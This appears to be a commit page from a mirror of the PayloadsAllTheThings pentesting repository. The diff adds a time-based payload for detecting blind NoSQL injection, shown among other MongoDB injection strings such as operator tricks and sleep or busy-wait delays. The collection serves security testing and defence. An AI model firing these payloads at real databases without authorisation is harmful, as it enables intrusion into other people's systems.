mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Added payload to detect more reliably blind NoSQL injection
This commit is contained in:
parent
3793d91fd4
commit
be12684bc0
1 changed files with 1 additions and 0 deletions
|
@ -16,4 +16,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||
{$gt: ''}
|
||||
[$ne]=1
|
||||
';sleep(5000);
|
||||
';sleep(5000);'
|
||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||
|
|
Loading…
Reference in a new issue